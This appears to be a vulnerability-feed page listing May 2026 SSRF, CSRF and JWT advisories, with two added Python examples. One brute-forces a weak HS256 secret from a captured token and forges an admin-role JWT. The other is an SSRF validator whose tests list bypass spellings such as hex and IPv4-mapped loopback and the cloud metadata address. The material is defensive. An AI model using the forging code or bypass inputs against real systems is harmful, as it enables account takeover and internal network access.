Tenable Nessus
added 2026/05/08 12:00 a.m.

IBM MQ 9.1 < 9.1.0.36 LTS / 9.2 < 9.2.0.42 LTS / 9.3 < 9.3.0.40 LTS / 9.3 < 9.4.5.1 CD / 9.4 < 9.4.0.21 LTS / 9.4.5.1 (7271941)

The version of IBM MQ Server running on the remote host is affected by a vulnerability as referenced in the 7271941 advisory. - IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.3: IBM WebSphere Application Server Liberty is vulnerable to server-side request forgery (SSRF). This may...

CVSS 5.4 | AI score 7.3 | EPSS 0.00284
Exploits 0 | References 2

Snyk
added 2026/05/07 10:32 p.m.

Server-side Request Forgery (SSRF)

Overview utcp-http is a UTCP communication protocol plugin for HTTP, SSE, and streamable HTTP, plus an OpenAPI converter. Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the call_tool and call_tool_streaming functions when attacker-controlled URLs from OpenA...

CVSS 4.7 | AI score 5.8 | EPSS 0.00168
Exploits 0 | References 2

Github Security Blog
added 2026/05/07 10:32 p.m.

utcp-http vulnerable to SSRF via attacker-controlled OpenAPI servers[0].url in HTTP communication protocol

Summary The utcp-http plugin is vulnerable to a blind Server-Side Request Forgery (SSRF) caused by a trust-boundary inconsistency between manual discovery and tool invocation. register_manual validates the discovery URL against an HTTPS / loopback allowlist, but call_tool and call_tool_streaming reuse...

CVSS 4.7 | AI score 5.9 | EPSS 0.00168
Exploits 0 | References 3 | Affected Software 1

OSV
added 2026/05/07 10:32 p.m.

GHSA-39J6-4867-GG4W utcp-http vulnerable to SSRF via attacker-controlled OpenAPI servers[0].url in HTTP communication protocol

Summary The utcp-http plugin is vulnerable to a blind Server-Side Request Forgery (SSRF) caused by a trust-boundary inconsistency between manual discovery and tool invocation. register_manual validates the discovery URL against an HTTPS / loopback allowlist, but call_tool and call_tool_streaming reuse...

CVSS 4.7 | AI score 5.9 | EPSS 0.00168
Exploits 0 | References 3

NVD
added 2026/05/07 10:16 p.m.

CVE-2026-8034

A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...

CVSS 9.8 | EPSS 0.00377
Exploits 0 | References 5

NVD
added 2026/05/07 10:16 p.m.

CVE-2026-41105

Server-side request forgery (SSRF) in Azure Notification Service allows an authorized attacker to elevate privileges over a network...

CVSS 8.1 | EPSS 0.00827
Exploits 0 | References 1

Github Security Blog
added 2026/05/07 9:28 p.m.

Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo

Summary The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest, which has ValidatePublicHTTPURL with private IP blocking. This allows authenticated users to make the server request arbitrary URLs...

AI score 5.9
Exploits 0 | References 3 | Affected Software 1

OSV
added 2026/05/07 9:28 p.m.

GHSA-8MC6-XJPR-H98X Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo

Summary The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest, which has ValidatePublicHTTPURL with private IP blocking. This allows authenticated users to make the server request arbitrary URLs...

CVSS 7.7 | AI score 5.9
Exploits 0 | References 3

Snyk
added 2026/05/07 9:28 p.m.

Server-side Request Forgery (SSRF)

Overview Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the fetchPeerConnectInfo function. An attacker can access sensitive internal resources by supplying crafted URLs to the server, which are then requested on behalf of the authenticated user. Remediati...

CVSS 7.7 | AI score 5.5
Exploits 0 | References 2

Github Security Blog
added 2026/05/07 9:21 p.m.

Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation

Summary No authentication is required to invoke PUT /api/echo/like/:id. The handler is registered on the public router group. The service increments favcount for the given echo without checking identity, without a per-user limit, and without CSRF tokens. A remote client can arbitrarily inflate li...

AI score 5.9
Exploits 0 | References 3 | Affected Software 1

OSV
added 2026/05/07 9:21 p.m.

GHSA-RGJ7-VG8V-J4WR Ech0's Unauthenticated Like Endpoint Enables Arbitrary Engagement Metric Inflation

Summary No authentication is required to invoke PUT /api/echo/like/:id. The handler is registered on the public router group. The service increments favcount for the given echo without checking identity, without a per-user limit, and without CSRF tokens. A remote client can arbitrarily inflate li...

CVSS 5.3 | AI score 5.9
Exploits 0 | References 3

CVE
added 2026/05/07 9:18 p.m.

CVE-2026-8034

CVE-2026-8034 is a server-side request forgery (SSRF) vulnerability in the GitHub Enterprise Server notebook viewer. The issue stems from URL parser confusion between the validation layer and the HTTP request library, where hostname validation uses a different parser than the request library, all...

CVSS 9.8 | AI score 5.8 | EPSS 0.00377
Exploits 0 | References 5 | Affected Software 1

Cvelist
added 2026/05/07 9:18 p.m.

CVE-2026-8034 Server-side request forgery vulnerability in GitHub Enterprise Server notebook viewer via URL parser confusion

A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a differe...

CVSS 7.9 | EPSS 0.00377
Exploits 0 | References 5

NVD
added 2026/05/07 9:16 p.m.

CVE-2026-42449

n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. In versions 2.47.4 through 2.47.13, in the SDK embedder path (the N8NDocumentationMCPServer constructor, getN8nApiClient, and validateInstanceContext), the synchronous URL validator in...

CVSS 8.5 | EPSS 0.00206
Exploits 0 | References 2

Github Security Blog
added 2026/05/07 9:08 p.m.

Note Mark has a JWT Secret Weakness that allows Full Account Takeover via Token Forgery

Summary No minimum length or entropy is enforced on the JWT_SECRET configuration value. The application accepts any base64-decodable secret regardless of size, including secrets as short as 1 byte. HS256 secrets below 32 bytes are brute-forceable offline, allowing attackers to recover the signing...

CVSS 10 | AI score 5.9 | EPSS 0.00124
Exploits 0 | References 5 | Affected Software 1
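For the Note Mark entry, the following is an added example (not the project's code) of why an unchecked short HS256 secret is a full account takeover: from one captured token, an attacker recovers a 1-byte secret offline and mints a token with a changed claim. The token contents, the claim names and all function names here are constructed for the example; load_jwt_secret is the check the entry says was missing, with the 32-byte floor taken from RFC 7518 section 3.2.

```python
import base64
import hashlib
import hmac
import json
from itertools import product
from typing import Optional

MIN_SECRET_BYTES = 32  # RFC 7518 section 3.2: an HS256 key must be at least 256 bits


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(signing_input: str, secret: bytes) -> str:
    return b64url_encode(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())


def make_jwt(payload: dict, secret: bytes) -> str:
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}.{hs256_sign(f'{header}.{body}', secret)}"


def verify_jwt(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the HS256 signature checks out, else None."""
    header, body, sig = token.split(".")
    if not hmac.compare_digest(hs256_sign(f"{header}.{body}", secret), sig):
        return None
    return json.loads(b64url_decode(body))


def recover_secret(token: str, max_len: int = 2) -> Optional[bytes]:
    """Offline brute force: try every byte string up to max_len against the token's
    own signature. One byte is 256 HMACs, two bytes 65,536. Nothing touches the
    server, so no rate limit or audit log fires."""
    header, body, sig = token.split(".")
    signing_input = f"{header}.{body}"
    for n in range(1, max_len + 1):
        for candidate in product(range(256), repeat=n):
            secret = bytes(candidate)
            if hmac.compare_digest(hs256_sign(signing_input, secret), sig):
                return secret
    return None


def forge_with_claim(token: str, claim: str, value) -> Optional[str]:
    """Recover the secret from a captured token, then mint a token with one claim changed."""
    secret = recover_secret(token)
    if secret is None:
        return None
    payload = json.loads(b64url_decode(token.split(".")[1]))
    payload[claim] = value
    return make_jwt(payload, secret)


def load_jwt_secret(configured: str) -> bytes:
    """The missing check: decode the base64 config value and refuse anything shorter
    than the HS256 output size. Assumption: the config value is standard base64."""
    raw = base64.b64decode(configured, validate=True)
    if len(raw) < MIN_SECRET_BYTES:
        raise ValueError(f"JWT secret is {len(raw)} bytes; HS256 needs at least {MIN_SECRET_BYTES}")
    return raw


def secret_is_acceptable(configured: str) -> bool:
    try:
        load_jwt_secret(configured)
    except ValueError:
        return False
    return True


def demo() -> dict:
    """Constructed scenario: the server signs with the 1-byte secret that a config
    value of "Kg==" decodes to; an attacker holding any valid token takes over."""
    weak_secret = b"\x2a"
    captured = make_jwt({"sub": "alice", "role": "user"}, weak_secret)
    forged = forge_with_claim(captured, "role", "admin")
    return {
        "recovered": recover_secret(captured),
        "forged_accepted_as": verify_jwt(forged, weak_secret),
    }


if __name__ == "__main__":
    print(demo())
```

The 32-byte floor is the minimum, not a target: a randomly generated 32-byte secret is fine, and anything shorter should fail startup rather than be silently accepted. The brute force here is bounded to two bytes only to keep the example fast; the work grows by 256 per extra byte, which is why 32 bytes is out of reach and 1 byte is not.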
ATTACKERKB
added 2026/05/07 8:58 p.m.

CVE-2026-41105

Server-side request forgery (SSRF) in Azure Notification Service allows an authorized attacker to elevate privileges over a network...

CVSS 8.1 | AI score 5.8 | EPSS 0.00827
Exploits 0 | References 2

Snyk
added 2026/05/07 8:52 p.m.

Server-side Request Forgery (SSRF)

Overview nuxt-og-image provides OG image generation for Nuxt. Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to inadequate validation of user-supplied URLs in the isBlockedUrl process. An attacker can access internal network resources or sensitiv...

CVSS 6.3 | AI score 5.8 | EPSS 0.00171
Exploits 0 | References 2

OSV
added 2026/05/07 8:52 p.m.

GHSA-C2RM-G55X-8HR5 nuxt-og-image SSRF — bypass of GHSA-pqhr-mp3f-hrpp / v6.2.5 fix (IPv6 + redirect)

Summary The isBlockedUrl denylist introduced in nuxt-og-image@6.2.5 to remediate GHSA-pqhr-mp3f-hrpp (Dmitry Prokhorov / Positive Technologies, March 2026) is incomplete. The patch advisory states "Decimal/hexadecimal IP encoding bypasses are also handled"; that part is true, since Node's WHATWG URL pars...

CVSS 3.7 | AI score 6 | EPSS 0.00171
Exploits 0 | References 3
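The SSRF entries in this listing (utcp-http, GitHub Enterprise Server CVE-2026-8034, Ech0, nuxt-og-image) share one failure pattern: the URL is judged as text in one place (an allowlist at discovery time, an isBlockedUrl denylist, a hostname validator using a different parser than the HTTP library) and then fetched by code that parses, resolves or redirects differently. The following is an added example, not code from any of the listed projects, of a validator that checks every resolved address rather than the hostname string, unwraps IPv4-mapped IPv6, pins the address it approved, and re-validates each redirect hop. The host table, the canned responses and the names stub_resolve, stub_send, validate_public_url and fetch_with_safe_redirects are constructed so the example runs offline.

```python
import ipaddress
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

Resolver = Callable[[str], List[str]]
Transport = Callable[[str, str], Tuple[int, Dict[str, str], bytes]]

# Constructed stand-in for DNS. Real code calls socket.getaddrinfo(host, port)
# and must keep every returned address, not just the first.
FAKE_DNS: Dict[str, List[str]] = {
    "public.example": ["1.2.3.4"],
    "rebind.example": ["1.2.3.4", "10.0.0.5"],    # second answer is RFC 1918
    "metadata.internal": ["169.254.169.254"],      # cloud metadata endpoint
    "v6public.example": ["2001:4860:4860::8888"],
}


def stub_resolve(host: str) -> List[str]:
    """IP literals resolve to themselves; inet_aton shorthands such as
    0x7f000001 or 2130706433 collapse to dotted quads, as glibc does."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    try:
        n = int(host, 0)
        if 0 <= n <= 0xFFFFFFFF:
            return [str(ipaddress.IPv4Address(n))]
    except ValueError:
        pass
    return FAKE_DNS.get(host, [])


def is_public(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    # ::ffff:127.0.0.1 is IPv6 on the wire but loopback in effect: unwrap it.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not (ip.is_private or ip.is_loopback or ip.is_link_local
                                 or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_public_url(url: str, resolve: Resolver = stub_resolve) -> str:
    """Return the one IP the request may connect to, or raise ValueError.
    The caller must connect to that pinned IP instead of resolving again,
    otherwise a second lookup can hand back a different, internal address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")  # http://public.example@10.0.0.5/ style confusion
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    addrs = resolve(host)
    if not addrs:
        raise ValueError(f"unresolvable host: {host!r}")
    for addr in addrs:
        if not is_public(addr):
            raise ValueError(f"{host!r} resolves to non-public address {addr}")
    return addrs[0]


def is_blocked(url: str, resolve: Resolver = stub_resolve) -> bool:
    try:
        validate_public_url(url, resolve)
    except ValueError:
        return True
    return False


# Constructed responses keyed by URL, standing in for the remote sites.
FAKE_SITE: Dict[str, Tuple[int, Dict[str, str], bytes]] = {
    "http://public.example/ok": (200, {}, b"hello"),
    "http://public.example/bounce": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "http://public.example/hop": (302, {"Location": "/ok"}, b""),
}


def stub_send(url: str, pinned_ip: str) -> Tuple[int, Dict[str, str], bytes]:
    return FAKE_SITE.get(url, (404, {}, b""))


def fetch_with_safe_redirects(url: str, send: Transport = stub_send,
                              resolve: Resolver = stub_resolve, max_hops: int = 3) -> Tuple[int, bytes]:
    """Follow redirects by hand and validate every hop. Clients that auto-follow
    validate only the first URL, which is the bypass the nuxt-og-image entry
    describes: a public URL that 302s to an internal one."""
    for _ in range(max_hops + 1):
        pinned = validate_public_url(url, resolve)
        status, headers, body = send(url, pinned)
        if status not in (301, 302, 303, 307, 308):
            return status, body
        location = headers.get("Location")
        if not location:
            raise ValueError("redirect without Location")
        url = urljoin(url, location)  # relative Location is resolved against the current URL
    raise ValueError("too many redirects")


def demo() -> Dict[str, str]:
    out = {}
    for u in ("http://public.example/hop", "http://public.example/bounce",
              "http://rebind.example/", "http://[::ffff:7f00:1]/", "http://0x7f000001/"):
        try:
            status, body = fetch_with_safe_redirects(u)
            out[u] = f"{status} {body.decode()}"
        except ValueError as exc:
            out[u] = f"blocked: {exc}"
    return out


if __name__ == "__main__":
    for url, result in demo().items():
        print(f"{url:40} {result}")
```

Two design points carry the weight here. First, the decision is made on resolved addresses, so decimal, hex, IPv6-literal and IPv4-mapped spellings of the same host all fall through the same check, which is what a string denylist cannot guarantee and what the parser-confusion entry for CVE-2026-8034 illustrates when validator and client disagree on what the hostname even is. Second, the validator returns the address it approved and the transport is expected to connect to it; approving a name and letting the HTTP client resolve it again reopens the gap the Ech0 and utcp-http entries describe, where one code path validates and another fetches.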
RedhatCVE
added 2026/05/07 8:21 p.m.

CVE-2026-40174

Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cUsers.updateAddress function does not properly validate anti-CSRF tokens for user address management operations. An attacker can induce a logged-in administrator to submit a forged request that adds,...

CVSS 7.1 | AI score 5.7 | EPSS 0.00165
Exploits 0 | References 1

RedhatCVE
added 2026/05/07 8:21 p.m.

CVE-2026-40309

Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cTrash.empty function does not validate anti-CSRF tokens for trash management requests. An attacker can induce a logged-in administrator to submit a forged request that empties the trash and permanent...

CVSS 7.2 | AI score 5.7 | EPSS 0.00165
Exploits 0 | References 1